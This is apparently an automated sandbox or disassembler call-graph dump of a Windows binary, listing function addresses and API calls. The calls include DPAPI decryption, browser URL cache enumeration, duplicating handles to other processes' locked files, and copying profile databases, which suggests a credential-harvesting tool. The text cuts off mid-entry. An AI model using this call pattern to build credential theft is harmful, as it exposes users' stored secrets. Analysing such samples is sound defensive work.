28 API calls 38510->39224 39225 404423 38510->39225 38511->38510 38511->38512 38512->38510 38514 40bef6 _wcsnicmp 38513->38514 38514->38510 38514->38512 38515->38510 38516 4135f7 39240 4135e0 38516->39240 38519 40b2cc 27 API calls 38520 41360d 38519->38520 38521 40a804 8 API calls 38520->38521 38522 413613 38521->38522 38523 41361b 38522->38523 38524 41363e 38522->38524 38525 40b273 27 API calls 38523->38525 38526 4135e0 FreeLibrary 38524->38526 38527 413625 GetProcAddress 38525->38527 38528 413643 38526->38528 38527->38524 38529 413648 38527->38529 38528->38288 38530 413658 38529->38530 38531 4135e0 FreeLibrary 38529->38531 38530->38288 38532 413666 38531->38532 38532->38288 39243 4449b9 38533->39243 38536 444c1f 38536->38269 38537 4449b9 42 API calls 38539 444b4b 38537->38539 38538 444c15 38541 4449b9 42 API calls 38538->38541 38539->38538 39264 444972 GetVersionExW 38539->39264 38541->38536 38542 444b99 memcmp 38547 444b8c 38542->38547 38543 444c0b 39268 444a85 42 API calls 38543->39268 38547->38542 38547->38543 39265 444aa5 42 API calls 38547->39265 39266 40a7a0 GetVersionExW 38547->39266 39267 444a85 42 API calls 38547->39267 38550 40399d 38549->38550 39269 403a16 38550->39269 38552 403a09 39283 40b1ab free free 38552->39283 38554 403a12 wcsrchr 38554->38278 38555 4039a3 38555->38552 38558 4039f4 38555->38558 39280 40a02c CreateFileW 38555->39280 38558->38552 38559 4099c6 2 API calls 38558->38559 38559->38552 38561 414c2e 17 API calls 38560->38561 38562 404048 38561->38562 38563 414c2e 17 API calls 38562->38563 38564 404056 38563->38564 38565 409d1f 6 API calls 38564->38565 38566 404073 38565->38566 38567 409d1f 6 API calls 38566->38567 38568 40408e 38567->38568 38569 409d1f 6 API calls 38568->38569 38570 4040a6 38569->38570 38571 403af5 20 API calls 38570->38571 38572 4040ba 38571->38572 38573 403af5 20 API calls 38572->38573 38574 4040cb 38573->38574 39310 40414f memset 38574->39310 38576 404140 39324 40b1ab free free 38576->39324 38577 4040ec memset 38581 4040e0 38577->38581 38579 404148 38579->38343 38580 4099c6 2 API calls 38580->38581 38581->38576 38581->38577 38581->38580 38582 40a8ab 9 API calls 38581->38582 38582->38581 39337 40a6e6 WideCharToMultiByte 38583->39337 38585 4087ed 39338 4095d9 memset 38585->39338 38588 408809 memset memset memset memset memset 38589 40b2cc 27 API calls 38588->38589 38590 4088a1 38589->38590 38591 409d1f 6 API calls 38590->38591 38592 4088b1 38591->38592 38593 40b2cc 27 API calls 38592->38593 38594 4088c0 38593->38594 38595 409d1f 6 API calls 38594->38595 38596 4088d0 38595->38596 38597 40b2cc 27 API calls 38596->38597 38598 4088df 38597->38598 38599 409d1f 6 API calls 38598->38599 38600 4088ef 38599->38600 38601 40b2cc 27 API calls 38600->38601 38602 4088fe 38601->38602 38603 409d1f 6 API calls 38602->38603 38604 40890e 38603->38604 38605 40b2cc 27 API calls 38604->38605 38606 40891d 38605->38606 38607 409d1f 6 API calls 38606->38607 38608 40892d 38607->38608 39357 409b98 GetFileAttributesW 38608->39357 38610 40893e 38615 408953 38615->38343 38635 40b633 free 38634->38635 38636 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38635->38636 38637 413f00 Process32NextW 38636->38637 38638 413da5 OpenProcess 38637->38638 38639 413f17 CloseHandle 38637->38639 38640 413eb0 38638->38640 38641 413df3 memset 38638->38641 38639->38380 38640->38637 38643 413ebf free 38640->38643 38644 4099f4 3 API calls 38640->38644 39781 413f27 38641->39781 38643->38640 38644->38640 38645 413e1f 38646 413e37 GetModuleHandleW 38645->38646 39786 413959 38645->39786 39802 413ca4 38645->39802 38646->38645 38648 413e46 GetProcAddress 38646->38648 38648->38645 38650 413ea2 CloseHandle 38650->38640 38652 414c2e 17 API calls 38651->38652 38653 403eb7 38652->38653 38654 414c2e 17 API calls 38653->38654 38655 403ec5 38654->38655 38656 409d1f 6 API calls 38655->38656 38657 403ee2 38656->38657 38658 409d1f 6 API calls 38657->38658 38659 403efd 38658->38659 38660 409d1f 6 API calls 38659->38660 38661 403f15 38660->38661 38662 403af5 20 API calls 38661->38662 38663 403f29 38662->38663 38664 403af5 20 API calls 38663->38664 38665 403f3a 38664->38665 38666 40414f 33 API calls 38665->38666 38672 403f4f 38666->38672 38667 403faf 39816 40b1ab free free 38667->39816 38669 403f5b memset 38669->38672 38670 403fb7 38670->38316 38671 4099c6 2 API calls 38671->38672 38672->38667 38672->38669 38672->38671 38673 40a8ab 9 API calls 38672->38673 38673->38672 38675 414c2e 17 API calls 38674->38675 38676 403d26 38675->38676 38677 414c2e 17 API calls 38676->38677 38678 403d34 38677->38678 38679 409d1f 6 API calls 38678->38679 38680 403d51 38679->38680 38681 409d1f 6 API calls 38680->38681 38682 403d6c 38681->38682 38683 409d1f 6 API calls 38682->38683 38684 403d84 38683->38684 38685 403af5 20 API calls 38684->38685 38686 403d98 38685->38686 38687 403af5 20 API calls 38686->38687 38688 403da9 38687->38688 38689 40414f 33 API calls 38688->38689 38690 403dbe 38689->38690 38691 403e1e 38690->38691 38693 403dca memset 38690->38693 38695 4099c6 2 API calls 38690->38695 38696 40a8ab 9 API calls 38690->38696 39817 40b1ab free free 38691->39817 38693->38690 38694 403e26 38694->38331 38695->38690 38696->38690 38698 414b81 9 API calls 38697->38698 38699 414c40 38698->38699 38700 414c73 memset 38699->38700 39818 409cea 38699->39818 38702 414c94 38700->38702 39821 414592 RegOpenKeyExW 38702->39821 38705 414c64 SHGetSpecialFolderPathW 38707 414d0b 38705->38707 38706 414cc1 38708 414cf4 wcscpy 38706->38708 39822 414bb0 wcscpy 38706->39822 38707->38323 38708->38707 38710 414cd2 39823 4145ac RegQueryValueExW 38710->39823 38712 414ce9 RegCloseKey 38712->38708 38714 409d62 38713->38714 38715 409d43 wcscpy 38713->38715 38714->38354 38716 409719 2 API calls 38715->38716 38717 409d51 wcscat 38716->38717 38717->38714 38719 40aebe FindClose 38718->38719 38720 40ae21 38719->38720 38721 4099c6 2 API calls 38720->38721 38722 40ae35 38721->38722 38723 409d1f 6 API calls 38722->38723 38724 40ae49 38723->38724 38724->38397 38726 40ade0 38725->38726 38729 40ae0f 38725->38729 38727 40ade7 wcscmp 38726->38727 38726->38729 38728 40adfe wcscmp 38727->38728 38727->38729 38728->38729 38729->38397 38731 40ae18 9 API calls 38730->38731 38732 4453c4 38731->38732 38733 40ae51 9 API calls 38732->38733 38734 4453f3 38732->38734 38735 40add4 2 API calls 38732->38735 38738 445403 254 API calls 38732->38738 38733->38732 38736 40aebe FindClose 38734->38736 38735->38732 38737 4453fe 38736->38737 38737->38397 38738->38732 38740 40ae7b FindNextFileW 38739->38740 38741 40ae5c FindFirstFileW 38739->38741 38742 40ae94 38740->38742 38743 40ae8f 38740->38743 38741->38742 38745 40aeb6 38742->38745 38746 409d1f 6 API calls 38742->38746 38744 40aebe FindClose 38743->38744 38744->38742 38745->38397 38746->38745 38747->38308 38748->38287 38749->38383 38750->38364 38751->38364 38752->38398 38754 409c89 38753->38754 38754->38420 38755->38450 38757 413d39 38756->38757 38758 413d2f FreeLibrary 38756->38758 38759 40b633 free 38757->38759 38758->38757 38760 413d42 38759->38760 38761 40b633 free 38760->38761 38762 413d4a 38761->38762 38762->38277 38763->38280 38764->38333 38765->38347 38767 44db70 38766->38767 38768 40b6fc memset 38767->38768 38769 409c70 2 API calls 38768->38769 38770 40b732 wcsrchr 38769->38770 38771 40b743 38770->38771 38772 40b746 memset 38770->38772 38771->38772 38773 40b2cc 27 API calls 38772->38773 38774 40b76f 38773->38774 38775 409d1f 6 API calls 38774->38775 38776 40b783 38775->38776 39824 409b98 GetFileAttributesW 38776->39824 38778 40b792 38779 40b7c2 38778->38779 38780 409c70 2 API calls 38778->38780 39825 40bb98 38779->39825 38782 40b7a5 38780->38782 38784 40b2cc 27 API calls 38782->38784 38788 40b7b2 38784->38788 38785 40b837 CloseHandle 38787 40b83e memset 38785->38787 38786 40b817 38789 409a45 3 API calls 38786->38789 39858 40a6e6 WideCharToMultiByte 38787->39858 38791 409d1f 6 API calls 38788->38791 38792 40b827 CopyFileW 38789->38792 38791->38779 38792->38787 38793 40b866 38794 444432 121 API calls 38793->38794 38795 40b879 38794->38795 38796 40bad5 38795->38796 38797 40b273 27 API calls 38795->38797 38798 40baeb 38796->38798 38799 40bade DeleteFileW 38796->38799 38800 40b89a 38797->38800 38801 40b04b ??3@YAXPAX 38798->38801 38799->38798 38802 438552 134 API calls 38800->38802 38803 40baf3 38801->38803 38804 40b8a4 38802->38804 38803->38357 38805 40bacd 38804->38805 38807 4251c4 137 API calls 38804->38807 38806 443d90 111 API calls 38805->38806 38806->38796 38830 40b8b8 38807->38830 38808 40bac6 39868 424f26 123 API calls 38808->39868 38809 40b8bd memset 39859 425413 17 API calls 38809->39859 38812 425413 17 API calls 38812->38830 38815 40a71b MultiByteToWideChar 38815->38830 38816 40a734 MultiByteToWideChar 38816->38830 38819 40b9b5 memcmp 38819->38830 38820 4099c6 2 API calls 38820->38830 38821 404423 38 API calls 38821->38830 38824 40bb3e memset memcpy 39869 40a734 MultiByteToWideChar 38824->39869 38825 4251c4 137 API calls 38825->38830 38827 40bb88 LocalFree 38827->38830 38830->38808 38830->38809 38830->38812 38830->38815 38830->38816 38830->38819 38830->38820 38830->38821 38830->38824 38830->38825 38831 40ba5f memcmp 38830->38831 39860 4253ef 16 API calls 38830->39860 39861 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38830->39861 39862 4253af 17 API calls 38830->39862 39863 4253cf 17 API calls 38830->39863 39864 447280 memset 38830->39864 39865 447960 memset memcpy memcpy memcpy 38830->39865 39866 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38830->39866 39867 447920 memcpy memcpy memcpy 38830->39867 38831->38830 38832->38359 38834 40aed1 38833->38834 38835 40aec7 FindClose 38833->38835 38834->38291 38835->38834 38837 4099d7 38836->38837 38838 4099da memcpy 38836->38838 38837->38838 38838->38342 38840 40b2cc 27 API calls 38839->38840 38841 44543f 38840->38841 38842 409d1f 6 API calls 38841->38842 38843 44544f 38842->38843 39953 409b98 GetFileAttributesW 38843->39953 38845 44545e 38846 445476 38845->38846 38847 40b6ef 253 API calls 38845->38847 38848 40b2cc 27 API calls 38846->38848 38847->38846 38849 445482 38848->38849 38850 409d1f 6 API calls 38849->38850 38851 445492 38850->38851 39954 409b98 GetFileAttributesW 38851->39954 38853 4454a1 38854 4454b9 38853->38854 38855 40b6ef 253 API calls 38853->38855 38854->38372 38855->38854 38856->38371 38857->38388 38858->38394 38859->38431 38860->38409 38861->38458 38862->38458 38863->38439 38864->38469 38865->38471 38866->38473 38868 414c2e 17 API calls 38867->38868 38869 40c2ae 38868->38869 38939 40c1d3 38869->38939 38874 40c3be 38891 40a8ab 38874->38891 38875 40afcf 2 API calls 38876 40c2fd FindFirstUrlCacheEntryW 38875->38876 38877 40c3b6 38876->38877 38878 40c31e wcschr 38876->38878 38879 40b04b ??3@YAXPAX 38877->38879 38880 40c331 38878->38880 38881 40c35e FindNextUrlCacheEntryW 38878->38881 38879->38874 38883 40a8ab 9 API calls 38880->38883 38881->38878 38882 40c373 GetLastError 38881->38882 38884 40c3ad FindCloseUrlCache 38882->38884 38885 40c37e 38882->38885 38886 40c33e wcschr 38883->38886 38884->38877 38887 40afcf 2 API calls 38885->38887 38886->38881 38888 40c34f 38886->38888 38889 40c391 FindNextUrlCacheEntryW 38887->38889 38890 40a8ab 9 API calls 38888->38890 38889->38878 38889->38884 38890->38881 39128 40a97a 38891->39128 38894 40a8cc 38894->38480 38895 40a8d0 7 API calls 38895->38894 39133 40b1ab free free 38896->39133 38898 40c3dd 38899 40b2cc 27 API calls 38898->38899 38900 40c3e7 38899->38900 39134 414592 RegOpenKeyExW 38900->39134 38902 40c3f4 38903 40c50e 38902->38903 38904 40c3ff 38902->38904 38918 405337 38903->38918 38905 40a9ce 4 API calls 38904->38905 38906 40c418 memset 38905->38906 39135 40aa1d 38906->39135 38909 40c471 38911 40c47a _wcsupr 38909->38911 38910 40c505 RegCloseKey 38910->38903 38912 40a8d0 7 API calls 38911->38912 38913 40c498 38912->38913 38914 40a8d0 7 API calls 38913->38914 38915 40c4ac memset 38914->38915 38916 40aa1d 38915->38916 38917 40c4e4 RegEnumValueW 38916->38917 38917->38910 38917->38911 39137 405220 38918->39137 38922 4099c6 2 API calls 38921->38922 38923 40a714 _wcslwr 38922->38923 38924 40c634 38923->38924 39194 405361 38924->39194 38927 40c65c wcslen 39197 4053b6 39 API calls 38927->39197 38928 40c71d wcslen 38928->38494 38930 40c677 38931 40c713 38930->38931 39198 40538b 39 API calls 38930->39198 39200 4053df 39 API calls 38931->39200 38934 40c6a5 38934->38931 38935 40c6a9 memset 38934->38935 38936 40c6d3 38935->38936 39199 40c589 44 API calls 38936->39199 38938->38487 38940 40ae18 9 API calls 38939->38940 38946 40c210 38940->38946 38941 40ae51 9 API calls 38941->38946 38942 40c264 38943 40aebe FindClose 38942->38943 38945 40c26f 38943->38945 38944 40add4 2 API calls 38944->38946 38951 40e5ed memset memset 38945->38951 38946->38941 38946->38942 38946->38944 38947 40c231 _wcsicmp 38946->38947 38948 40c1d3 35 API calls 38946->38948 38947->38946 38949 40c248 38947->38949 38948->38946 38964 40c084 22 API calls 38949->38964 38952 414c2e 17 API calls 38951->38952 38953 40e63f 38952->38953 38954 409d1f 6 API calls 38953->38954 38955 40e658 38954->38955 38965 409b98 GetFileAttributesW 38955->38965 38957 40e667 38958 40e680 38957->38958 38959 409d1f 6 API calls 38957->38959 38966 409b98 GetFileAttributesW 38958->38966 38959->38958 38961 40e68f 38962 40c2d8 38961->38962 38967 40e4b2 38961->38967 38962->38874 38962->38875 38964->38946 38965->38957 38966->38961 38988 40e01e 38967->38988 38969 40e593 38970 40e5b0 38969->38970 38971 40e59c DeleteFileW 38969->38971 38972 40b04b ??3@YAXPAX 38970->38972 38971->38970 38974 40e5bb 38972->38974 38973 40e521 38973->38969 39011 40e175 38973->39011 38976 40e5c4 CloseHandle 38974->38976 38977 40e5cc 38974->38977 38976->38977 38979 40b633 free 38977->38979 38978 40e573 38980 40e584 38978->38980 38981 40e57c CloseHandle 38978->38981 38982 40e5db 38979->38982 39054 40b1ab free free 38980->39054 38981->38980 38985 40b633 free 38982->38985 38984 40e540 38984->38978 39031 40e2ab 38984->39031 38986 40e5e3 38985->38986 38986->38962 39055 406214 38988->39055 38991 40e16b 38991->38973 38994 40afcf 2 API calls 38995 40e08d OpenProcess 38994->38995 38996 40e0a4 GetCurrentProcess DuplicateHandle 38995->38996 39000 40e152 38995->39000 38997 40e0d0 GetFileSize 38996->38997 38998 40e14a CloseHandle 38996->38998 39091 409a45 GetTempPathW 38997->39091 38998->39000 38999 40e160 39003 40b04b ??3@YAXPAX 38999->39003 39000->38999 39002 406214 22 API calls 39000->39002 39002->38999 39003->38991 39004 40e0ea 39094 4096dc CreateFileW 39004->39094 39006 40e0f1 CreateFileMappingW 39007 40e140 CloseHandle CloseHandle 39006->39007 39008 40e10b MapViewOfFile 39006->39008 39007->38998 39009 40e13b CloseHandle 39008->39009 39010 40e11f WriteFile UnmapViewOfFile 39008->39010 39009->39007 39010->39009 39012 40e18c 39011->39012 39095 406b90 39012->39095 39015 40e1a7 memset 39021 40e1e8 39015->39021 39016 40e299 39105 4069a3 39016->39105 39022 40e283 39021->39022 39023 40dd50 _wcsicmp 39021->39023 39029 40e244 _snwprintf 39021->39029 39112 406e8f 13 API calls 39021->39112 39113 40742e 8 API calls 39021->39113 39114 40aae3 wcslen wcslen _memicmp 39021->39114 39115 406b53 SetFilePointerEx ReadFile 39021->39115 39024 40e291 39022->39024 39025 40e288 free 39022->39025 39023->39021 39026 40aa04 free 39024->39026 39025->39024 39026->39016 39030 40a8d0 7 API calls 39029->39030 39030->39021 39032 40e2c2 39031->39032 39033 406b90 11 API calls 39032->39033 39039 40e2d3 39033->39039 39034 40e4a0 39035 4069a3 2 API calls 39034->39035 39037 40e4ab 39035->39037 39037->38984 39039->39034 39040 40e489 39039->39040 39043 40dd50 _wcsicmp 39039->39043 39049 40e3e0 memcpy 39039->39049 39050 40e3fb memcpy 39039->39050 39051 40e3b3 wcschr 39039->39051 39052 40e416 memcpy 39039->39052 39053 40e431 memcpy 39039->39053 39116 406e8f 13 API calls 39039->39116 39117 40dd50 _wcsicmp 39039->39117 39126 40742e 8 API calls 39039->39126 39127 406b53 SetFilePointerEx ReadFile 39039->39127 39041 40aa04 free 39040->39041 39042 40e491 39041->39042 39042->39034 39044 40e497 free 39042->39044 39043->39039 39044->39034 39046 40e376 memset 39118 40aa29 39046->39118 39049->39039 39050->39039 39051->39039 39052->39039 39053->39039 39054->38969 39056 406294 CloseHandle 39055->39056 39057 406224 39056->39057 39058 4096c3 CreateFileW 39057->39058 39059 40622d 39058->39059 39060 406281 GetLastError 39059->39060 39061 40a2ef ReadFile 39059->39061 39065 40625a 39060->39065 39062 406244 39061->39062 39062->39060 39063 40624b 39062->39063 39064 406777 19 API calls 39063->39064 39063->39065 39064->39065 39065->38991 39066 40dd85 memset 39065->39066 39067 409bca GetModuleFileNameW 39066->39067 39068 40ddbe CreateFileW 39067->39068 39071 40ddf1 39068->39071 39069 40afcf ??2@YAPAXI ??3@YAXPAX 39069->39071 39070 41352f 9 API calls 39070->39071 39071->39069 39071->39070 39072 40de0b NtQuerySystemInformation 39071->39072 39073 40de3b CloseHandle GetCurrentProcessId 39071->39073 39072->39071 39074 40de54 39073->39074 39075 413d4c 46 API calls 39074->39075 39083 40de88 39075->39083 39076 40e00c 39077 413d29 free FreeLibrary 39076->39077 39078 40e014 39077->39078 39078->38991 39078->38994 39079 40dea9 _wcsicmp 39080 40dee7 OpenProcess 39079->39080 39081 40debd _wcsicmp 39079->39081 39080->39083 39081->39080 39082 40ded0 _wcsicmp 39081->39082 39082->39080 39082->39083 39083->39076 39083->39079 39084 40dfef CloseHandle 39083->39084 39085 40df23 GetCurrentProcess DuplicateHandle 39083->39085 39088 40df8f CloseHandle 39083->39088 39089 40df78 39083->39089 39084->39083 39085->39083 39086 40df4c memset 39085->39086 39087 41352f 9 API calls 39086->39087 39087->39083 39088->39089 39089->39084 39089->39088 39090 40dfae _wcsicmp 39089->39090 39090->39083 39090->39089 39092 409a74 GetTempFileNameW 39091->39092 39093 409a66 GetWindowsDirectoryW 39091->39093 39092->39004 39093->39092 39094->39006 39096 406bd5 39095->39096 39097 406bad 39095->39097 39099 4066bf free malloc memcpy free free 39096->39099 39104 406c0f 39096->39104 39097->39096 39098 406bba _wcsicmp 39097->39098 39098->39096 39098->39097 39100 406be5 39099->39100 39101 40afcf ??2@YAPAXI ??3@YAXPAX 39100->39101 39100->39104 39102 406bff 39101->39102 39103 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39102->39103 39103->39104 39104->39015 39104->39016 39106 4069c4 ??3@YAXPAX 39105->39106 39107 4069af 39106->39107 39108 40b633 free 39107->39108 39109 4069ba 39108->39109 39110 40b04b ??3@YAXPAX 39109->39110 39111 4069c2 39110->39111 39111->38984 39112->39021 39113->39021 39114->39021 39115->39021 39116->39039 39117->39046 39119 40aa33 39118->39119 39120 40aa63 39118->39120 39121 40aa44 39119->39121 39122 40aa38 wcslen 39119->39122 39120->39039 39123 40a9ce malloc memcpy free free 39121->39123 39122->39121 39124 40aa4d 39123->39124 39124->39120 39125 40aa51 memcpy 39124->39125 39125->39120 39126->39039 39127->39039 39129 40a980 39128->39129 39130 40a8bb 39129->39130 39131 40a995 _wcsicmp 39129->39131 39132 40a99c wcscmp 39129->39132 39130->38894 39130->38895 39131->39129 39132->39129 39133->38898 39134->38902 39136 40aa23 RegEnumValueW 39135->39136 39136->38909 39136->38910 39138 405335 39137->39138 39139 40522a 39137->39139 39138->38494 39140 40b2cc 27 API calls 39139->39140 39141 405234 39140->39141 39142 40a804 8 API calls 39141->39142 39143 40523a 39142->39143 39182 40b273 39143->39182 39145 405248 _mbscpy _mbscat GetProcAddress 39146 40b273 27 API calls 39145->39146 39147 405279 39146->39147 39185 405211 GetProcAddress 39147->39185 39149 405282 39150 40b273 27 API calls 39149->39150 39151 40528f 39150->39151 39186 405211 GetProcAddress 39151->39186 39153 405298 39154 40b273 27 API calls 39153->39154 39155 4052a5 39154->39155 39187 405211 GetProcAddress 39155->39187 39157 4052ae 39158 40b273 27 API calls 39157->39158 39159 4052bb 39158->39159 39188 405211 GetProcAddress 39159->39188 39161 4052c4 39162 40b273 27 API calls 39161->39162 39163 4052d1 39162->39163 39189 405211 GetProcAddress 39163->39189 39165 4052da 39166 40b273 27 API calls 39165->39166 39167 4052e7 39166->39167 39190 405211 GetProcAddress 39167->39190 39169 4052f0 39170 40b273 27 API calls 39169->39170 39171 4052fd 39170->39171 39191 405211 GetProcAddress 39171->39191 39173 405306 39174 40b273 27 API calls 39173->39174 39175 405313 39174->39175 39192 405211 GetProcAddress 39175->39192 39177 40531c 39178 40b273 27 API calls 39177->39178 39179 405329 39178->39179 39193 405211 GetProcAddress 39179->39193 39181 405332 39181->39138 39183 40b58d 27 API calls 39182->39183 39184 40b18c 39183->39184 39184->39145 39185->39149 39186->39153 39187->39157 39188->39161 39189->39165 39190->39169 39191->39173 39192->39177 39193->39181 39195 405220 39 API calls 39194->39195 39196 405369 39195->39196 39196->38927 39196->38928 39197->38930 39198->38934 39199->38931 39200->38928 39202 40440c FreeLibrary 39201->39202 39203 40436d 39202->39203 39204 40a804 8 API calls 39203->39204 39205 404377 39204->39205 39206 404383 39205->39206 39207 404405 39205->39207 39208 40b273 27 API calls 39206->39208 39207->38499 39207->38500 39207->38501 39209 40438d GetProcAddress 39208->39209 39210 40b273 27 API calls 39209->39210 39211 4043a7 GetProcAddress 39210->39211 39212 40b273 27 API calls 39211->39212 39213 4043ba GetProcAddress 39212->39213 39214 40b273 27 API calls 39213->39214 39215 4043ce GetProcAddress 39214->39215 39216 40b273 27 API calls 39215->39216 39217 4043e2 GetProcAddress 39216->39217 39218 4043f1 39217->39218 39219 4043f7 39218->39219 39220 40440c FreeLibrary 39218->39220 39219->39207 39220->39207 39222 404413 FreeLibrary 39221->39222 39223 40441e 39221->39223 39222->39223 39223->38516 39224->38510 39226 40447e 39225->39226 39227 40442e 39225->39227 39228 404485 CryptUnprotectData 39226->39228 39229 40449c 39226->39229 39230 40b2cc 27 API calls 39227->39230 39228->39229 39229->38510 39231 404438 39230->39231 39232 40a804 8 API calls 39231->39232 39233 40443e 39232->39233 39234 404445 39233->39234 39235 404467 39233->39235 39236 40b273 27 API calls 39234->39236 39235->39226 39238 404475 FreeLibrary 39235->39238 39237 40444f GetProcAddress 39236->39237 39237->39235 39239 404460 39237->39239 39238->39226 39239->39235 39241 4135f6 39240->39241 39242 4135eb FreeLibrary 39240->39242 39241->38519 39242->39241 39244 4449c4 39243->39244 39245 444a52 39243->39245 39246 40b2cc 27 API calls 39244->39246 39245->38536 39245->38537 39247 4449cb 39246->39247 39248 40a804 8 API calls 39247->39248 39249 4449d1 39248->39249 39250 40b273 27 API calls 39249->39250 39251 4449dc GetProcAddress 39250->39251 39252 40b273 27 API calls 39251->39252 39253 4449f3 GetProcAddress 39252->39253 39254 40b273 27 API calls 39253->39254 39255 444a04 GetProcAddress 39254->39255 39256 40b273 27 API calls 39255->39256 39257 444a15 GetProcAddress 39256->39257 39258 40b273 27 API calls 39257->39258 39259 444a26 GetProcAddress 39258->39259 39260 40b273 27 API calls 39259->39260 39261 444a37 GetProcAddress 39260->39261 39262 40b273 27 API calls 39261->39262 39264->38547 39265->38547 39266->38547 39267->38547 39268->38538 39270 403a29 39269->39270 39284 403bed memset memset 39270->39284 39272 403ae7 39297 40b1ab free free 39272->39297 39274 403a3f memset 39278 403a2f 39274->39278 39275 403aef 39275->38555 39276 40a8d0 7 API calls 39276->39278 39277 409d1f 6 API calls 39277->39278 39278->39272 39278->39274 39278->39276 39278->39277 39279 409b98 GetFileAttributesW 39278->39279 39279->39278 39281 40a051 GetFileTime CloseHandle 39280->39281 39282 4039ca CompareFileTime 39280->39282 39281->39282 39282->38555 39283->38554 39285 414c2e 17 API calls 39284->39285 39286 403c38 39285->39286 39287 409719 2 API calls 39286->39287 39288 403c3f wcscat 39287->39288 39289 414c2e 17 API calls 39288->39289 39290 403c61 39289->39290 39291 409719 2 API calls 39290->39291 39292 403c68 wcscat 39291->39292 39298 403af5 39292->39298 39295 403af5 20 API calls 39296 403c95 39295->39296 39296->39278 39297->39275 39299 403b02 39298->39299 39300 40ae18 9 API calls 39299->39300 39308 403b37 39300->39308 39301 403bdb 39302 40aebe FindClose 39301->39302 39304 403be6 39302->39304 39303 40add4 wcscmp wcscmp 39303->39308 39304->39295 39305 40ae18 9 API calls 39305->39308 39306 40ae51 9 API calls 39306->39308 39307 40aebe FindClose 39307->39308 39308->39301 39308->39303 39308->39305 39308->39306 39308->39307 39309 40a8d0 7 API calls 39308->39309 39309->39308 39311 409d1f 6 API calls 39310->39311 39312 404190 39311->39312 39325 409b98 GetFileAttributesW 39312->39325 39314 40419c 39315 4041a7 6 API calls 39314->39315 39316 40435c 39314->39316 39318 40424f 39315->39318 39316->38581 39318->39316 39319 40425e memset 39318->39319 39321 409d1f 6 API calls 39318->39321 39322 40a8ab 9 API calls 39318->39322 39326 414842 39318->39326 39319->39318 39320 404296 wcscpy 39319->39320 39320->39318 39321->39318 39323 4042b6 memset memset _snwprintf wcscpy 39322->39323 39323->39318 39324->38579 39325->39314 39329 41443e 39326->39329 39328 414866 39328->39318 39330 41444b 39329->39330 39331 414451 39330->39331 39332 4144a3 GetPrivateProfileStringW 39330->39332 39333 414491 39331->39333 39334 414455 wcschr 39331->39334 39332->39328 39336 414495 WritePrivateProfileStringW 39333->39336 39334->39333 39335 414463 _snwprintf 39334->39335 39335->39336 39336->39328 39337->38585 39339 40b2cc 27 API calls 39338->39339 39340 409615 39339->39340 39341 409d1f 6 API calls 39340->39341 39342 409625 39341->39342 39367 409b98 GetFileAttributesW 39342->39367 39344 409634 39345 409648 39344->39345 39368 4091b8 memset 39344->39368 39347 40b2cc 27 API calls 39345->39347 39350 408801 39345->39350 39348 40965d 39347->39348 39349 409d1f 6 API calls 39348->39349 39351 40966d 39349->39351 39350->38588 39350->38615 39420 409b98 GetFileAttributesW 39351->39420 39353 40967c 39353->39350 39354 409681 39353->39354 39421 409529 72 API calls 39354->39421 39356 409690 39356->39350 39357->38610 39367->39344 39422 40a6e6 WideCharToMultiByte 39368->39422 39370 409202 39423 444432 39370->39423 39373 40b273 27 API calls 39374 409236 39373->39374 39469 438552 39374->39469 39377 409383 39379 40b273 27 API calls 39377->39379 39380 409399 39379->39380 39383 438552 134 API calls 39380->39383 39401 4093a3 39383->39401 39387 4094ff 39390 4251c4 137 API calls 39390->39401 39394 4093df 39396 4253cf 17 API calls 39396->39401 39400 40951d 39400->39345 39401->39387 39401->39390 39401->39394 39401->39396 39404 4093e4 39401->39404 39420->39353 39421->39356 39422->39370 39519 4438b5 39423->39519 39425 44444c 39426 409215 39425->39426 39533 415a6d 39425->39533 39426->39373 39426->39400 39428 4442e6 11 API calls 39430 44469e 39428->39430 39429 444486 39431 4444b9 memcpy 39429->39431 39468 4444a4 39429->39468 39430->39426 39433 443d90 111 API calls 39430->39433 39537 415258 39431->39537 39433->39426 39434 444524 39435 444541 39434->39435 39436 44452a 39434->39436 39540 444316 39435->39540 39437 416935 16 API calls 39436->39437 39437->39468 39440 444316 18 API calls 39441 444563 39440->39441 39442 444316 18 API calls 39441->39442 39468->39428 39658 438460 39469->39658 39471 409240 39471->39377 39472 4251c4 39471->39472 39709 424f07 39472->39709 39474 4251e4 39520 4438d0 39519->39520 39530 4438c9 39519->39530 39607 415378 memcpy memcpy 39520->39607 39530->39425 39534 415a77 39533->39534 39535 415a8d 39534->39535 39536 415a7e memset 39534->39536 39535->39429 39536->39535 39538 4438b5 11 API calls 39537->39538 39539 41525d 39538->39539 39539->39434 39541 444328 39540->39541 39542 444423 39541->39542 39543 44434e 39541->39543 39608 4446ea 11 API calls 39542->39608 39544 432d4e 3 API calls 39543->39544 39546 44435a 39544->39546 39548 444375 39546->39548 39553 44438b 39546->39553 39547 432d4e 3 API calls 39549 4443ec 39547->39549 39550 416935 16 API calls 39548->39550 39551 444381 39549->39551 39550->39551 39551->39440 39553->39547 39608->39551 39670 41703f 39658->39670 39660 43847a 39661 43848a 39660->39661 39662 43847e 39660->39662 39677 438270 39661->39677 39707 4446ea 11 API calls 39662->39707 39667 4384bb 39669 438488 39669->39471 39671 417044 39670->39671 39672 41705c 39670->39672 39674 416760 11 API calls 39671->39674 39676 417055 39671->39676 39673 417075 39672->39673 39675 41707a 11 API calls 39672->39675 39673->39660 39674->39676 39675->39671 39676->39660 39678 415a91 memset 39677->39678 39679 43828d 39678->39679 39680 438297 39679->39680 39681 438341 39679->39681 39683 4382d6 39679->39683 39682 415c7d 16 API calls 39680->39682 39684 44358f 19 API calls 39681->39684 39685 438458 39682->39685 39686 4382fb 39683->39686 39687 4382db 39683->39687 39697 438318 39684->39697 39685->39669 39708 424f26 123 API calls 39685->39708 39689 415c23 memcpy 39686->39689 39688 416935 16 API calls 39687->39688 39690 4382e9 39688->39690 39691 438305 39689->39691 39692 415c7d 16 API calls 39690->39692 39694 44358f 19 API calls 39691->39694 39691->39697 39692->39680 39693 438373 39696 438383 39693->39696 39698 4300e8 memset memset memcpy 39693->39698 39694->39697 39695 43819e 115 API calls 39695->39693 39699 4383cd 39696->39699 39701 415c23 memcpy 39696->39701 39697->39693 39697->39695 39698->39696 39701->39699 39707->39669 39708->39667 39710 424f1f 39709->39710 39711 424f0c 39709->39711 39730 424eea 11 API calls 39710->39730 39729 416760 11 API calls 39711->39729 39714 